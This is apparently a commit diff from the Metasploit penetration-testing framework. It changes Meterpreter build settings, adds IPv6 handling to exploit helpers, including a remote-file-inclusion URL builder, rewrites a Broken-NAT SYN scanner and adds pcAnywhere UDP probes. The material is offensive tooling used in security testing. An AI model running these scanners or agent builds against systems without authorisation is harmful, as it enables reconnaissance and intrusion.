+"linux-msf", "gcc:\\$\\${MSF_CFLAGS} -DL_ENDIAN -DTERMIO -Wall::\\$\\${MSF_CFLAGS} -D_REENTRANT::\\$\\${MSF_CFLAGS} -ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:\\$\\${MSF_CFLAGS} -fPIC::.so.\\$(SHLIB_MAJOR).\\$(SHLIB_MINOR)",\
+#;' > Configure-msf
+mv Configure-msf Configure
+chmod +x Configure
+
+./Configure --prefix=/tmp/out threads shared no-hw no-dlfcn no-zlib no-krb5 no-idea 386 linux-msf
+cd ..
+
+
+# These have to be relative to PWD because the OpenSSL make system builds in
+# multiple different levels of subdirs, so we can't just use ../../
+export LIBC=${PWD}/../bionic/libc
+export LIBM=${PWD}/../bionic/libm
+export COMPILED=${PWD}/../bionic/compiled
+
+export MSF_CFLAGS="-Os -Wl,--hash-style=sysv -march=i386 -nostdinc -nostdlib -fno-builtin -fpic -I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/ -I${LIBC}/private -I${LIBM}/include -DPIC -Dwchar_t='char' -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -D_BYTE_ORDER=_LITTLE_ENDIAN -L${COMPILED} -lc"
+
+# We don't need all the random executable utilities that 'all' builds, just the
+# important .so files
+#make -C $OSSL depend clean all
+
+make -C $OSSL depend clean build_libs
-export CFLAGS="-I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/ -I${LIBC}/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${LIBM}/include -L${COMPILED} -D_BYTE_ORDER=_LITTLE_ENDIAN -lc"
-make -C $OSSL depend clean all
11 external/source/meterpreter/source/server/rtld/Makefile
View
@@ -3,10 +3,10 @@ CFLAGS=-I${PWD}/hack
CFLAGS+= -I ../../bionic/libc/include -I ../../bionic/libc/kernel/common/linux/ -I ../../bionic/libc/kernel/common/ -I ../../bionic/libc/arch-x86/include/
CFLAGS+= -I ../../bionic/libc/kernel/arch-x86/ -I../../source/server/elf/headers -I../../bionic/libc/private -fPIC -DPIC
CFLAGS+= -nostdinc -nostdlib -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t" -DANDROID_X86_LINKER
-CFLAGS+= -ggdb
+#CFLAGS+= -ggdb
CFLAGS+= -DMETSRV_RTLD -D_BYTE_ORDER=_LITTLE_ENDIAN
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
OBJ=msflinker.o basic_libc.o syscall.o linker_format.o dlfcn.o zlib.o metsrv_rtld.o
@@ -14,9 +14,10 @@ all: msflinker msflinker.bin rtldtest
msflinker: $(OBJ)
gcc -Wl,-script=script -Wl,--hash-style=sysv $(CFLAGS) -o msflinker $(OBJ) -lgcc
+ strip msflinker
msflinker.bin: msflinker elf2bin.c
- gcc -o elf2bin elf2bin.c
+ gcc -march=i386 -m32 -o elf2bin elf2bin.c
./elf2bin msflinker msflinker.bin
libc.h: ../../bionic/compiled/libc.so
@@ -50,7 +51,7 @@ libpcap.h: ../../bionic/compiled/libpcap.so
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
rtldtest: rtldtest.c msflinker
- gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
+ gcc -march=i386 -m32 -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`
.s.o:
gcc $(CFLAGS) -c $<
@@ -61,5 +62,5 @@ rtldtest: rtldtest.c msflinker
clean:
rm -f libmetsrv_main.h libssl.h libcrypto.h libm.h libc.h libsupport.h
rm -f *.o
- rm -f msflinker msflinker.so
+ rm -f msflinker msflinker.bin msflinker.so
rm -f rtldtest elf2bin
4 external/source/meterpreter/source/server/rtld/elf2bin.c
View
@@ -60,7 +60,7 @@ int main(int argc, char **argv)
ehdr = (Elf32_Ehdr *)data;
phdr = (Elf32_Phdr *)(data + ehdr->e_phoff);
- printf("data @ %08x, mapping @ %08x\n", data, mapping);
+ printf("data @ %p, mapping @ %p\n", data, mapping);
for(i = 0; i < ehdr->e_phnum; i++, phdr++) {
if(phdr->p_type == PT_LOAD) {
@@ -71,7 +71,7 @@ int main(int argc, char **argv)
source = data + (phdr->p_offset & ~4095);
dest = mapping + ((phdr->p_vaddr - base) & ~4095);
len = phdr->p_filesz + (phdr->p_vaddr & 4095);
- printf("memcpy(%08x, %08x, %08x)\n", dest, source, len);
+ printf("memcpy(%p, %p, %08x)\n", dest, source, len);
memcpy(dest, source, len);
used += (phdr->p_memsz + (phdr->p_vaddr & 4095) + 4095) & ~4095 ;
8 external/source/meterpreter/source/server/rtld/linker_debug.h
View
@@ -29,7 +29,7 @@
#ifndef _LINKER_DEBUG_H_
#define _LINKER_DEBUG_H_
-#define LINKER_DEBUG 1
+#define LINKER_DEBUG 0
#include <stdio.h>
@@ -41,9 +41,9 @@
* or 0 to use stdout instead.
*/
#define LINKER_DEBUG_TO_LOG 0
-#define TRACE_DEBUG 1
-#define DO_TRACE_LOOKUP 1
-#define DO_TRACE_RELO 1
+#define TRACE_DEBUG 0
+#define DO_TRACE_LOOKUP 0
+#define DO_TRACE_RELO 0
/*********************************************************************
* You shouldn't need to modify anything below unless you are adding
2  external/source/meterpreter/workspace/Makefile
View
@@ -1,6 +1,6 @@
SUBDIRS = common metsrv ext_server_stdapi ext_server_sniffer ext_server_networkpug
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
subdirs:
for dir in $(SUBDIRS); do \
2  external/source/meterpreter/workspace/common/Makefile
View
@@ -18,7 +18,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled
CFLAGS+= -D_UNIX -I$(SOURCEPATH) -I$(MALLOC_PATH) -I$(XOR_PATH) -DMALLOC_PRODUCTION -DPIC -I$(SSLPATH) -I$(STDLIBPATH) -I$(ZLIB_PATH)
CFLAGS+= -g -fPIC -Os -D_POSIX_C_SOURCE=200809 -D__BSD_VISIBLE=1 -D__XSI_VISIBLE=1
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
CC=gcc
2  external/source/meterpreter/workspace/ext_posix_sample/Makefile
View
@@ -15,7 +15,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
objects = test.o
2  external/source/meterpreter/workspace/ext_server_networkpug/Makefile
View
@@ -16,7 +16,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
#LDFLAGS= -fPIC -Bshareable -lc
2  external/source/meterpreter/workspace/ext_server_sniffer/Makefile
View
@@ -17,7 +17,7 @@ CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/networkpug -lc -lpcap -lsupport -lmetsrv_main
CFLAGS+= -I.
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
objects = sniffer.o
2  external/source/meterpreter/workspace/ext_server_stdapi/Makefile
View
@@ -15,7 +15,7 @@ CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
CFLAGS+= -fPIC -Os
CFLAGS+= -I../../source/extensions/stdapi/server -lc -lsupport -lmetsrv_main -lpcap
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
#LDFLAGS= -fPIC -Bshareable -lc
2  external/source/meterpreter/workspace/metsrv/Makefile
View
@@ -13,7 +13,7 @@ CFLAGS+= -Dwchar_t="char" -fno-builtin -D_SIZE_T_DECLARED -DElf_Size="u_int32_t"
CFLAGS+= -D_BYTE_ORDER=_LITTLE_ENDIAN
CFLAGS+= -lgcc -L../../source/bionic/compiled -gstabs+
-CFLAGS+= -march=i386
+CFLAGS+= -march=i386 -m32
OS=posix
OSVPATH=../../source/common/arch/$(OS):../../source/server/linux/
2  lib/msf/core/auxiliary/report.rb
View
@@ -23,7 +23,7 @@ def myworkspace
end
def inside_workspace_boundary?(ip)
- return if not framework.db.active
+ return true if not framework.db.active
allowed = myworkspace.allow_actions_on?(ip)
return allowed
end
1  lib/msf/core/db.rb
View
@@ -262,6 +262,7 @@ def find_or_create_host(opts)
# :arch -- one of the ARCH_* constants
# :mac -- the host's MAC address
# :scope -- interface identifier for link-local IPv6
+ # :virtual_host -- the name of the VM host software, eg "VMWare", "QEMU", "Xen", etc.
#
def report_host(opts)
3  lib/msf/core/exploit/http/client.rb
View
@@ -668,7 +668,8 @@ def http_fingerprint(opts={})
info << " ( #{extras.join(", ")} )" if extras.length > 0
# Report here even if info is empty since the fact that we didn't
# return early means we at least got a connection and the service is up
- report_service(:host => rhost, :port => rport, :name => (ssl ? 'https' : 'http'), :info => info.dup)
+ ssl = datastore['SSL']
+ report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
info
end
12 lib/msf/core/exploit/http/server.rb
View
@@ -293,6 +293,10 @@ def get_uri(cli=nil)
host = srvhost_addr
end
+ if Rex::Socket.is_ipv6?(host)
+ host = "[#{host}]"
+ end
+
if (ssl and datastore["SRVPORT"] == 443)
port = ''
elsif (!ssl and datastore["SRVPORT"] == 80)
@@ -331,7 +335,7 @@ def srvhost_addr
if (datastore['LHOST'])
host = datastore["LHOST"]
else
- if (datastore['SRVHOST'] == "0.0.0.0")
+ if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
if (sock and sock.peerhost)
host = Rex::Socket.source_address(sock.peerhost)
else
@@ -880,7 +884,11 @@ def on_request_uri(cli, request, headers={})
# Does not take SSL into account. For the reasoning behind this, see +exploit+.
#
def php_include_url(sock=nil)
- "http://#{srvhost_addr}:#{datastore['SRVPORT']}#{get_resource()}?"
+ host = srvhost_addr
+ if Rex::Socket.is_ipv6?(host)
+ host = "[#{host}]"
+ end
+ "http://#{host}:#{datastore['SRVPORT']}#{get_resource()}?"
end
13 lib/msf/core/exploit/postgres.rb
View
@@ -52,6 +52,11 @@ def postgres_login(args={})
ip = args[:server] || datastore['RHOST']
port = args[:port] || datastore['RPORT']
uri = "tcp://#{ip}:#{port}"
+
+ if Rex::Socket.is_ipv6?(ip)
+ uri = "tcp://[#{ip}]:#{port}"
+ end
+
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
@@ -155,7 +160,13 @@ def postgres_fingerprint(args={})
password = args[:password] || datastore['PASSWORD']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
+
uri = "tcp://#{rhost}:#{rport}"
+ if Rex::Socket.is_ipv6?(rhost)
+ uri = "tcp://[#{rhost}]:#{rport}"
+ end
+
+
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
@@ -234,7 +245,7 @@ def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
- Rex::Text.rand_text_english(rand(6)+2)
+ 'INVALID_' + Rex::Text.rand_text_alpha(rand(6))
end
end
4 lib/msf/core/model/host.rb
View
@@ -21,6 +21,10 @@ class Host < ActiveRecord::Base
validates_exclusion_of :address, :in => ['127.0.0.1']
validates_uniqueness_of :address, :scope => :workspace_id
+ def is_vm?
+ !!self.virtual_host
+ end
+
def attribute_locked?(attr)
n = notes.find_by_ntype("host.updated.#{attr}")
n && n.data[:locked]
12 lib/msf/core/post/common.rb
View
@@ -30,6 +30,18 @@ def cmd_exec(cmd, opts=nil, time_out=15)
return o
end
+ def report_vm(vm)
+ return unless session
+ return unless vm
+ vm_normal = vm.to_s.lstrip.strip
+ return if vm_normal.empty?
+ vm_data = {
+ :host => session.target_host,
+ :virtual_host => vm_normal
+ }
+ report_host(vm_data)
+ end
+
end
end
end
20 lib/msf/core/post/file.rb
View
@@ -38,7 +38,11 @@ def file_local_digestmd5(file2md5)
#
def file_remote_digestmd5(file2md5)
- chksum = Digest::MD5.hexdigest(read_file(file2md5))
+ data = read_file(file2md5)
+ chksum = nil
+ if data
+ chksum = Digest::MD5.hexdigest(data)
+ end
return chksum
end
@@ -61,7 +65,11 @@ def file_local_digestsha1(file2sha1)
#
def file_remote_digestsha1(file2sha1)
- chksum = Digest::SHA1.hexdigest(read_file(file2sha1))
+ data = read_file(file2sha1)
+ chksum = nil
+ if data
+ chksum = Digest::SHA1.hexdigest(data)
+ end
return chksum
end
@@ -84,7 +92,11 @@ def file_local_digestsha2(file2sha2)
#
def file_remote_digestsha2(file2sha2)
- chksum = Digest::SHA256.hexdigest(read_file(file2sha2))
+ data = read_file(file2sha2)
+ chksum = nil
+ if data
+ chksum = Digest::SHA256.hexdigest(data)
+ end
return chksum
end
@@ -156,7 +168,7 @@ def read_file_meterpreter(file_name)
begin
fd = session.fs.file.new(file_name, "rb")
rescue ::Rex::Post::Meterpreter::RequestError => e
- print_error("Failed to open file: #{e.class} : #{e}")
+ print_error("Failed to open file: #{file_name}")
return nil
end
5 lib/msf/core/rpc/v10/rpc_module.rb
View
@@ -149,6 +149,11 @@ def rpc_execute(mtype, mname, opts)
end
+ def rpc_encode_formats
+ # Supported formats
+ Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
+ end
+
def rpc_encode(data, encoder, options)
# Load supported formats
supported_formats = Msf::Simple::Buffer.transform_formats + Msf::Util::EXE.to_executable_fmt_formats
31 lib/msf/ui/console/command_dispatcher/core.rb
View
@@ -940,7 +940,7 @@ def cmd_load(*args)
# Parse any extra options that should be passed to the plugin
args.each { |opt|
- k, v = opt.split(/=/)
+ k, v = opt.split(/\=/)
opts[k] = v if (k and v)
}
@@ -973,17 +973,28 @@ def cmd_load(*args)
# Tab completion for the load command
#
def cmd_load_tabs(str, words)
- return [] if words.length > 1
+ tabs = []
- begin
- return Dir.new(Msf::Config.plugin_directory).find_all { |e|
- path = Msf::Config.plugin_directory + File::SEPARATOR + e
- File.file?(path) and File.readable?(path)
- }.map { |e|
- e.sub!(/\.rb$/, '')
- }
- rescue Exception
+ if (not words[1] or not words[1].match(/^\//))
+ # then let's start tab completion in the scripts/resource directories
+ begin
+ [
+ Msf::Config.user_plugin_directory,
+ Msf::Config.plugin_directory
+ ].each do |dir|
+ next if not ::File.exist? dir
+ tabs += ::Dir.new(dir).find_all { |e|
+ path = dir + File::SEPARATOR + e
+ ::File.file?(path) and File.readable?(path)
+ }
+ end
+ rescue Exception
+ end
+ else
+ tabs += tab_complete_filenames(str,words)
end
+ return tabs.map{|e| e.sub(/.rb/, '')}
+
end
def cmd_route_help
2  lib/postgres/postgres-pr/connection.rb
View
@@ -171,7 +171,7 @@ def establish_connection(uri)
case u.scheme
when 'tcp'
@conn = Rex::Socket.create(
- 'PeerHost' => (u.host || DEFAULT_HOST),
+ 'PeerHost' => (u.host || DEFAULT_HOST).gsub(/[\[\]]/, ''), # Strip any brackets off (IPv6)
'PeerPort' => (u.port || DEFAULT_PORT),
'proto' => 'tcp'
)
2  modules/auxiliary/admin/natpmp/natpmp_map.rb
View
@@ -10,7 +10,7 @@ def initialize
super(
'Name' => 'NAT-PMP port mapper',
'Description' => 'Map (forward) TCP and UDP ports on NAT devices using NAT-PMP',
- 'Author' => 'jhart@spoofed.org',
+ 'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
11 modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb
View
@@ -71,9 +71,14 @@ def run
lfd = nil
if offset != 0
- # Turns out ruby's implementation of seek with "ab" mode is all kind of busted.
- lfd = ::File.open(datastore['LPATH'], "r+b")
- lfd.seek(offset)
+ begin
+ # Turns out ruby's implementation of seek with "ab" mode is all kind of busted.
+ lfd = ::File.open(datastore['LPATH'], "r+b")
+ lfd.seek(offset)
+ rescue Errno::ENOENT
+ print_error("Unable to open existing dump! Writing a new file instead of resuming...")
+ lfd = ::File.open(datastore['LPATH'], "wb")
+ end
else
lfd = ::File.open(datastore['LPATH'], "wb")
end
113 modules/auxiliary/bnat/bnat_scan.rb
View
@@ -13,15 +13,16 @@
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Capture
def initialize
super(
'Name' => 'BNAT Scanner',
'Version' => '$Revision$',
'Description' => %q{
- This module is a scanner which can detect Bad NAT (network address translation)
+ This module is a scanner which can detect Broken NAT (network address translation)
implementations, which could result in a inability to reach ports on remote
- machines. Typically, these ports will appear in nmap scans as 'filtered'.
+ machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'.
},
'Author' =>
[
@@ -35,68 +36,72 @@ def initialize
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
]
)
+
register_options(
[
- OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "1-10000"]),
- OptString.new('INTERFACE', [true, 'The interface connected to the network', 'eth0']),
+ OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "21,22,23,80,443"]),
+ OptString.new('INTERFACE', [true, "The name of the interface", "eth0"]),
+ OptInt.new('TIMEOUT', [true, "The reply read timeout in milliseconds", 500])
],self.class)
- end
-
- def run_host(ip)
- synack_hash = {}
- synack_array = []
- ftypes = %w{windows, linux, freebsd}
- @flavor = ftypes[rand(ftypes.length)] # we can randomize our flavor
-
- #Start Capture for !IP
- pcap = PacketFu::Capture.new(
- :iface => datastore['INTERFACE'],
- :start => true,
- :filter => "tcp and not host #{ip} and tcp[13] == 18")
-
- scan = Thread.new do
- iface = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE'])
- ports = Rex::Socket.portspec_crack(datastore['PORTS'])
- tcp_pkt = PacketFu::TCPPacket.new(:config => iface, :timeout => 0.1, :flavor => @flavor)
- tcp_pkt.ip_daddr = ip
- tcp_pkt.tcp_flags.syn = 1
+ deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN')
- #tcp_pkt.tcp_win = 14600
- # should be handled by the flavor config option
- #tcp_pkt.tcp_options = "MSS:1460,SACKOK,TS:3853;0,NOP,WS:5"
+ end
- ports.each do |port|
- tcp_pkt.tcp_src = rand(64511)+1024
- tcp_pkt.tcp_dst = port
- tcp_pkt.recalc
- tcp_pkt.to_w
- select(nil, nil, nil, 0.075)
- tcp_pkt.to_w
- end
- end
+ def probe_reply(pcap, to)
+ reply = nil
+ begin
+ Timeout.timeout(to) do
+ pcap.each do |r|
+ pkt = PacketFu::Packet.parse(r)
+ next unless pkt.is_tcp?
+ reply = pkt
+ break
+ end
+ end
+ rescue Timeout::Error
+ end
+ return reply
+ end
- analyze = Thread.new do
- loop do
- pcap.stream.each do |pkt|
- packet = PacketFu::Packet.parse(pkt)
- synack_hash = { :ip => packet.ip_saddr.to_s, :port => packet.tcp_sport.to_s}
- synack_array.push(synack_hash)
- end
- end
- end
+ def generate_probe(ip)
+ ftypes = %w{windows, linux, freebsd}
+ @flavor = ftypes[rand(ftypes.length)]
+ config = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE'])
+ p = PacketFu::TCPPacket.new(:config => config)
+ p.ip_daddr = ip
+ p.tcp_flags.syn = 1
+ return p
+ end
- # Wait for the scan to complete
- scan.join
- select(nil, nil, nil, 0.05)
- analyze.terminate
+ def run_host(ip)
+
+ open_pcap
+
+ to = (datastore['TIMEOUT'] || 500).to_f / 1000.0
- # Clean up any duplicate responses received
- synack_array = synack_array.uniq
+ p = generate_probe(ip)
+ pcap = self.capture
- synack_array.each do |synack|
- print_status "[BNAT Response] Request: #{ip} Response: #{synack[:ip]} Port: #{synack[:port]}"
- end
+ ports = Rex::Socket.portspec_crack(datastore['PORTS'])
+
+ ports.each_with_index do |port,i|
+ p.tcp_dst = port
+ p.tcp_src = rand(64511)+1024
+ p.tcp_seq = rand(64511)+1024
+ p.recalc
+
+ ackbpf = "tcp [8:4] == 0x#{(p.tcp_seq + 1).to_s(16)}"
+ pcap.setfilter("tcp and tcp[13] == 18 and not host #{ip} and src port #{p.tcp_dst} and dst port #{p.tcp_src} and #{ackbpf}")
+ capture_sendto(p, ip)
+ reply = probe_reply(pcap, to)
+ next if reply.nil?
+
+ print_status("[BNAT RESPONSE] Requested IP: #{ip} Responding IP: #{reply.ip_saddr} Port: #{reply.tcp_src}")
+ end
+
+ close_pcap
+
end
end
4 modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
View
@@ -73,12 +73,12 @@ def initialize
def get_pkt
buf = sock.get
- print_status("[in ] #{buf.inspect}") if datastore['VERBOSE']
+ vprint_status("[in ] #{buf.inspect}")
buf
end
def send_pkt(pkt, get_resp = false)
- print_status("[out] #{pkt.inspect}") if datastore['VERBOSE']
+ vprint_status("[out] #{pkt.inspect}")
sock.put(pkt)
get_pkt if get_resp
end
2  modules/auxiliary/gather/natpmp_external_address.rb
View
@@ -10,7 +10,7 @@ def initialize
super(
'Name' => 'NAT-PMP External address scanner',
'Description' => 'Scan NAT devices for their external address using NAT-PMP',
- 'Author' => 'jhart@spoofed.org',
+ 'Author' => 'Jon Hart <jhart[at]spoofed.org>',
'License' => MSF_LICENSE
)
118 modules/auxiliary/scanner/discovery/udp_probe.rb
View
@@ -51,6 +51,8 @@ def initialize
@probes << 'probe_pkt_sentinel'
@probes << 'probe_pkt_db2disco'
@probes << 'probe_pkt_citrix'
+ @probes << 'probe_pkt_pca_st'
+ @probes << 'probe_pkt_pca_nq'
end
@@ -64,7 +66,7 @@ def setup
# Fingerprint a single host
def run_host(ip)
-
+ @results = {}
@thost = ip
begin
@@ -103,7 +105,33 @@ def run_host(ip)
rescue ::Interrupt
raise $!
rescue ::Exception => e
- print_error("Unknown error: #{@thost}:#{@tport} #{e.class} #{e}")
+ print_error("Unknown error: #{@thost}:#{@tport} #{e.class} #{e} #{e.backtrace}")
+ end
+
+ @results.each_key do |k|
+ next if not @results[k].respond_to?('keys')
+ data = @results[k]
+
+ next unless inside_workspace_boundary?(data[:host])
+
+ conf = {
+ :host => data[:host],
+ :port => data[:port],
+ :proto => 'udp',
+ :name => data[:app],
+ :info => data[:info]
+ }
+
+ if data[:hname]
+ conf[:host_name] = data[:hname].downcase
+ end
+
+ if data[:mac]
+ conf[:mac] = data[:mac].downcase
+ end
+
+ report_service(conf)
+ print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})")
end
end
@@ -112,9 +140,7 @@ def run_host(ip)
# The response parsers
#
def parse_reply(pkt)
-
- @results ||= {}
-
+
# Ignore "empty" packets
return if not pkt[1]
@@ -122,15 +148,69 @@ def parse_reply(pkt)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
- # Ignore duplicates
- hkey = "#{pkt[1]}:#{pkt[2]}"
- return if @results[hkey]
-
app = 'unknown'
inf = ''
maddr = nil
hname = nil
+ hkey = "#{pkt[1]}:#{pkt[2]}"
+
+ # Work with protocols that return different data in different packets
+ # These are reported at the end of the scanning loop to build state
+ case pkt[2]
+ when 5632
+
+ @results[hkey] ||= {}
+ data = @results[hkey]
+
+ data[:app] = "pcAnywhere"
+ data[:port] = pkt[2]
+ data[:host] = pkt[1]
+
+ case pkt[0]
+
+ when /^NR(........................)(........)/
+ name = $1.dup
+ caps = $2.dup
+ name = name.gsub(/_+$/, '').gsub("\x00", '').strip
+ caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip
+ data[:name] = name
+ data[:caps] = caps
+
+ when /^ST(.+)/
+ buff = $1.dup
+ stat = 'Unknown'
+
+ if buff[2,1].unpack("C")[0] == 67
+ stat = "Available"
+ end
+
+ if buff[2,1].unpack("C")[0] == 11
+ stat = "Busy"
+ end
+
+ data[:stat] = stat
+ end
+
+ if data[:name]
+ inf << "Name: #{data[:name]} "
+ end
+
+ if data[:stat]
+ inf << "- #{data[:stat]} "
+ end
+
+ if data[:caps]
+ inf << "( #{data[:caps]} ) "
+ end
+ data[:info] = inf
+ end
+
+
+
+ # Ignore duplicates for the protocols below
+ return if @results[hkey]
+
case pkt[2]
when 53
@@ -146,6 +226,7 @@ def parse_reply(pkt)
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
+ @results[hkey] = true
when 137
app = 'NetBIOS'
@@ -190,6 +271,8 @@ def parse_reply(pkt)
hname = names[0][0]
end
end
+
+ @results[hkey] = true
when 111
app = 'Portmap'
@@ -209,6 +292,7 @@ def parse_reply(pkt)
)
end
inf = svc.join(", ")
+ @results[hkey] = true
when 123
app = 'NTP'
@@ -219,12 +303,14 @@ def parse_reply(pkt)
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
+ @results[hkey] = true
when 1434
app = 'MSSQL'
mssql_ping_parse(pkt[0]).each_pair { |k,v|
inf += k+'='+v+' '
}
+ @results[hkey] = true
when 161
app = 'SNMP'
@@ -243,20 +329,25 @@ def parse_reply(pkt)
inf = snmp_info
com = snmp_comm
+ @results[hkey] = true
when 5093
app = 'Sentinel'
+ @results[hkey] = true
when 523
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])
+ @results[hkey] = true
when 1604
app = 'citrix-ica'
return unless citrix_parse(pkt[0])
-
+ @results[hkey] = true
+
end
+ return unless inside_workspace_boundary?(pkt[1])
report_service(
:host => pkt[1],
:mac => (maddr and maddr != '00:00:00:00:00:00') ? maddr : nil,
@@ -419,6 +510,13 @@ def probe_pkt_citrix(ip) # Server hello packet from citrix_published_bruteforce
return [data, 1604]
end
+ def probe_pkt_pca_st(ip)
+ return ["ST", 5632]
+ end
+
+ def probe_pkt_pca_nq(ip)
+ return ["NQ", 5632]
+ end
end
122 modules/auxiliary/scanner/discovery/udp_sweep.rb
View
@@ -52,7 +52,9 @@ def initialize
@probes << 'probe_pkt_sentinel'
@probes << 'probe_pkt_db2disco'
@probes << 'probe_pkt_citrix'
-
+ @probes << 'probe_pkt_pca_st'
+ @probes << 'probe_pkt_pca_nq'
+
end
def setup
@@ -71,6 +73,8 @@ def run_batch_size
# Fingerprint a single host
def run_batch(batch)
+ @results = {}
+
print_status("Sending #{@probes.length} probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
begin
@@ -135,6 +139,33 @@ def run_batch(batch)
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
end
+
+ @results.each_key do |k|
+ next if not @results[k].respond_to?('keys')
+ data = @results[k]
+
+ next unless inside_workspace_boundary?(data[:host])
+
+ conf = {
+ :host => data[:host],
+ :port => data[:port],
+ :proto => 'udp',
+ :name => data[:app],
+ :info => data[:info]
+ }
+
+ if data[:hname]
+ conf[:host_name] = data[:hname].downcase
+ end
+
+ if data[:mac]
+ conf[:mac] = data[:mac].downcase
+ end
+
+ report_service(conf)
+ print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})")
+ end
+
end
@@ -142,7 +173,6 @@ def run_batch(batch)
# The response parsers
#
def parse_reply(pkt)
- @results ||= {}
# Ignore "empty" packets
return if not pkt[1]
@@ -153,12 +183,67 @@ def parse_reply(pkt)
# Ignore duplicates
hkey = "#{pkt[1]}:#{pkt[2]}"
- return if @results[hkey]
+
app = 'unknown'
inf = ''
maddr = nil
hname = nil
+
+
+ # Work with protocols that return different data in different packets
+ # These are reported at the end of the scanning loop to build state
+ case pkt[2]
+ when 5632
+
+ @results[hkey] ||= {}
+ data = @results[hkey]
+
+ data[:app] = "pcAnywhere"
+ data[:port] = pkt[2]
+ data[:host] = pkt[1]
+
+ case pkt[0]
+
+ when /^NR(........................)(........)/
+ name = $1.dup
+ caps = $2.dup
+ name = name.gsub(/_+$/, '').gsub("\x00", '').strip
+ caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip
+ data[:name] = name
+ data[:caps] = caps
+
+ when /^ST(.+)/
+ buff = $1.dup
+ stat = 'Unknown'
+
+ if buff[2,1].unpack("C")[0] == 67
+ stat = "Available"
+ end
+
+ if buff[2,1].unpack("C")[0] == 11
+ stat = "Busy"
+ end
+
+ data[:stat] = stat
+ end
+
+ if data[:name]
+ inf << "Name: #{data[:name]} "
+ end
+
+ if data[:stat]
+ inf << "- #{data[:stat]} "
+ end
+
+ if data[:caps]
+ inf << "( #{data[:caps]} ) "
+ end
+ data[:info] = inf
+ end
+
+ # Ignore duplicates
+ return if @results[hkey]
case pkt[2]
@@ -175,6 +260,8 @@ def parse_reply(pkt)
ver = pkt[0].unpack('H*')[0] if not ver
inf = ver if ver
+
+ @results[hkey] = true
when 137
app = 'NetBIOS'
@@ -219,6 +306,8 @@ def parse_reply(pkt)
hname = names[0][0]
end
end
+
+ @results[hkey] = true
when 111
app = 'Portmap'
@@ -239,6 +328,8 @@ def parse_reply(pkt)
)
end
inf = svc.join(", ")
+
+ @results[hkey] = true
when 123
app = 'NTP'
@@ -249,6 +340,8 @@ def parse_reply(pkt)
ver = 'NTP v4 (unsynchronized)' if (ver =~ /^e40/)
ver = 'Microsoft NTP' if (ver =~ /^dc00|^dc0f/)
inf = ver if ver
+
+ @results[hkey] = true
when 1434
app = 'MSSQL'
@@ -256,6 +349,8 @@ def parse_reply(pkt)
inf += k+'='+v+' '
}
+ @results[hkey] = true
+
when 161
app = 'SNMP'
asn = OpenSSL::ASN1.decode(pkt[0]) rescue nil
